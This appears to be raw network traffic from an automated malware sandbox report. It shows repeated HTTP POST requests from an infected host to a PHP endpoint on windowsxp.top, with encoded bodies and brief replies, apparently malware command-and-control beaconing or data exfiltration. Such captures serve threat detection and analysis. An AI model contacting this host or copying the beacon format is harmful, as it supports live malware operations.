                                                                                                                  Date: Sun, 27 Oct 2024 18:24:19 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l0dw7pH3gsvwsyELCOn6qFMj4Za21DD6t7rz9ww6iDnIRBtDDbs9R1OFx9q3Xj4AJlWI1HPcNmLNIOptySN40cwBXa4gqLMsBrvEjvH%2BYJi2PZclwiCSVjUoP%2B%2BJSAhA"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8e9d8db486b-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1996&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=722554&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


Session ID | Source IP | Source Port | Destination IP | Destination Port
105 | 192.168.2.4 | 50118 | 188.114.97.3 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:24:19.577697039 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
Oct 27, 2024 19:24:19.930756092 CET | 1716 | OUT | Data Raw: 50 50 58 54 5e 5e 53 53 54 58 57 54 54 52 5b 5d 59 5d 5b 5b 52 50 52 5d 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PPXT^^SSTXWTTR[]Y][[RPR]T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$1X0[5#&'.$ ^$+7/=;=<$U "0/<>&[9!Y##X(
Oct 27, 2024 19:24:20.179857016 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:24:20.386346102 CET | 927 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:20 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Om3qP7ZIbnmuTaM3%2BEbJ1H4iQud6rWSfWjZkE0P98HvGZXsapPXq%2BJEUjqGMU7tqlG%2BdQ0aQtxN6a9CxkQjX%2FxnZpfYQaa%2FUoXIgOB%2FfzLPV5cuV08QYo1hpasSJee3i"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8edcdc44787-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1104&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2037&delivery_rate=1341983&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 22 58 23 07 2b 0d 3d 3c 07 55 3e 1f 29 5f 24 3f 39 13 3b 0b 34 1c 3d 2d 14 0c 2f 38 2e 55 27 1a 07 0b 3c 07 2f 01 23 3d 37 0a 3d 0f 21 5e 00 1c 27 5e 22 3d 39 56 31 02 30 5b 25 33 24 17 22 04 20 04 3e 00 32 08 3c 39 3c 12 3c 01 33 55 2f 2f 29 56 31 00 39 06 2c 01 3e 5f 3c 2a 2a 54 0c 14 21 5a 3a 11 34 11 21 1f 3d 57 3d 0c 3c 5d 27 00 28 15 33 29 2c 56 2b 2c 05 58 3f 13 17 5c 36 12 23 03 2b 01 3e 5f 24 13 3b 13 3d 14 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"X#+=<U>)_$?9;4=-/8.U'</#=7=!^'^"=9V10[%3$" >2<9<<3U//)V19,>_<**T!Z:4!=W=<]'(3),V+,X?\6#+>_$;="T")S0YP0


Session ID | Source IP | Source Port | Destination IP | Destination Port
106 | 192.168.2.4 | 50119 | 188.114.97.3 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:24:20.000281096 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
Oct 27, 2024 19:24:20.352725983 CET | 1012 | OUT | Data Raw: 50 57 58 58 5e 58 53 54 54 58 57 54 54 57 5b 5e 59 5c 5b 58 52 56 52 5b 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PWXX^XSTTXWTTW[^Y\[XRVR[T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Y13":>"<Z9#3^8/=<V>$ _/-=/=.?!Y##X(+
Oct 27, 2024 19:24:20.596128941 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:24:20.906261921 CET | 772 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:20 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LOt7joyUtI%2F3cgRgbgRyBGNSE36ZMOA47P1Q2duEOt%2F8cyR4sCRlaUzUeaBzQbAdMJCafnPdgl45b4hSGuXI0RffMi5oHGyIQa2BfUnf1o4Vtt1xljUHyEC9%2BHVozWIq"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8f05fcf35a2-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1030&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1470050&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


Session ID | Source IP | Source Port | Destination IP | Destination Port
107 | 192.168.2.4 | 50120 | 188.114.97.3 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:24:21.031635046 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
Oct 27, 2024 19:24:21.413763046 CET | 1012 | OUT | Data Raw: 50 51 58 5e 5e 58 56 51 54 58 57 54 54 52 5b 5f 59 5a 5b 5b 52 52 52 53 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PQX^^XVQTXWTTR[_YZ[[RRRST\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Y'-(":&57.403;#8-<W),;7!/^;_=&.!Y##X(
Oct 27, 2024 19:24:21.634764910 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:24:21.851717949 CET | 785 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:21 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yYxlVg33Z5n%2FzRMU%2FI59KVkr63g%2BQgIv%2F0sdlsE6L1cRcYAK2iw62PAaSOUM9TukRRcRa%2FXv%2FtS0N%2FWynD35spk9v5NING01NJzjClL1%2FbKkCMi38J0Sa7z%2FKC%2FmNn8J"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8f6df440be8-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1614&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=906132&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


Session ID | Source IP | Source Port | Destination IP | Destination Port
108 | 192.168.2.4 | 50121 | 188.114.97.3 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:24:21.992827892 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
Oct 27, 2024 19:24:22.337152004 CET | 1012 | OUT | Data Raw: 55 53 58 59 5b 58 56 53 54 58 57 54 54 54 5b 52 59 51 5b 5e 52 51 52 5c 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: USXY[XVSTXWTTT[RYQ[^RQR\T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'X%>'""54,$43^<U;>/)(W""//8*/6Z-/!Y##X('
Oct 27, 2024 19:24:22.589334011 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:24:22.894195080 CET | 772 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:22 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RJfIYwXjir8afBGmwW2SW9xzkA5KFhd3UKWhPifvNZbu7AS6iJoGWJFHJhGkK%2F8wunbsrP7nv4NRI%2FcCkcf3K%2FqNt9qB3iR74EFtbDQfKJso7RpSralJ0mcB1dPYwWpD"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8fccc18ea0a-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1291&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1117283&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


Session ID | Source IP | Source Port | Destination IP | Destination Port
109 | 192.168.2.4 | 50122 | 188.114.97.3 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:24:23.034926891 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
Oct 27, 2024 19:24:23.388482094 CET | 1012 | OUT | Data Raw: 50 51 5d 5c 5e 53 53 54 54 58 57 54 54 50 5b 52 59 5e 5b 5e 52 53 52 5f 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PQ]\^SSTTXWTTP[RY^[^RSR_T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Z&=759=X6<_:'( V/ (?$ ! /[()?:^,/!Y##X(7
Oct 27, 2024 19:24:23.624043941 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:24:23.918884039 CET | 772 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:23 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FZiURlQgQaRnMJsgjHudPOBmCnfLbg8ka6BKv1YA6LHqewlDBMPQZeFlF%2FXLuX%2FdRkhmWOVgU4Il9hAZMAF3frOqd52Rs1bdoLbSH0VIlan0BV5DLNsIkwNgS2vO34d0"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b903492d2d4a-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1153&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1299820&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


Session ID | Source IP | Source Port | Destination IP | Destination Port
110 | 192.168.2.4 | 50123 | 188.114.97.3 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:24:24.044559002 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
Oct 27, 2024 19:24:24.399300098 CET | 1012 | OUT | Data Raw: 55 55 5d 59 5e 59 56 5e 54 58 57 54 54 53 5b 5a 59 59 5b 51 52 55 52 5c 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UU]Y^YV^TXWTTS[ZYY[QRUR\T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'\%>769)"$[.B<X0+(/S*,$W 2'Z->'="_:!Y##X(;
                                                                                                                  Oct 27, 2024 19:24:24.640912056 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:24.831068039 CET | 765 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:24 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3JbsaAhORgz9u0EADjrVh8KiJwSl4wkxSUySibYkcD%2BEvKtjzyuQhpcS79oJjxSgSBAeJ6m6iUUiFXGVFSH8Y8lEZ8kNphkLEL7POx5T2WEsL9CJMl3%2FXbc8wSDc46Bx"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b90999238d29-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1131&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1272407&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
                                                                                                                  Oct 27, 2024 19:24:24.831273079 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  111 | 192.168.2.4 | 50124 | 188.114.97.3 | 80
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:24:24.963299990 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:25.321954966 CET | 1012 | OUT | Data
                                                                                                                  Oct 27, 2024 19:24:25.590050936 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:25.794980049 CET | 780 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:25 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1kYknNZY9OJL1wiMKuUOo%2FQ2KhPPJ33o%2FrKxLb%2BcbgriWskb%2Fs%2FjKdu4ZOYOXJG5gZsHd9Dw%2FeYs09gDKD2yWh8duXntMQJZmljY%2BuVQobX0Ct5AjJcDXpQZ7PvBHtMX"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b90f89c72e19-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1386&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1065489&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  112 | 192.168.2.4 | 50125 | 188.114.97.3 | 80
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:24:25.407706022 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:25.758858919 CET | 1716 | OUT | Data
                                                                                                                  Oct 27, 2024 19:24:26.003123999 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:26.204607010 CET | 923 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:26 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8IVAK6hdb82MO8uA%2Barb2ep1c87ewkP6Up5nQ%2FQ3L615pxbqOZ%2F9SFmDB0aFX1W7RJiJJVIZq5pE9%2BKk5h8jrrqniQbI3tJHEt643vIXmStVIa35rIES1cvijDLMNFVH"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b9122e016c1a-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1147&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2037&delivery_rate=1309222&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  113 | 192.168.2.4 | 50126 | 188.114.97.3 | 80
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:24:25.920197964 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1008
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:26.274313927 CET | 1008 | OUT | Data
                                                                                                                  Oct 27, 2024 19:24:26.506963968 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:26.818957090 CET | 772 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:26 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CSpMvc7X8Zpl3%2FDBbHUlZFRP5n3C7u6ea9SxUYwIwBL1lAJWIcV4JhV1i2TjyhQsHXE3Rp9mIjpsZs%2Bx7EiAB3LaubCJEkTRzcmgCa%2Fhr4w0bfZII88Mseh5Fw4FESvE"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b9154f986b94-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1084&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1329&delivery_rate=1371212&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  114 | 192.168.2.4 | 50127 | 188.114.97.3 | 80
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:24:26.949157953 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:27.306215048 CET | 1012 | OUT | Data
                                                                                                                  Oct 27, 2024 19:24:27.544910908 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:27.739195108 CET | 782 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:27 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vLBB9CmkKQBHdGUxG%2FPHkPzj%2B%2FgzxthjlHj7RWeQoxD8XEieQ1UF0GXJ8GPUjd5jX%2BTxWQU4pRAu3Q0i7xQU%2FcGqOrwCwkvCV09A0%2BASeK%2FzCllM%2BCB9XoOAgpSH7COZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b91bcec66b3c-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
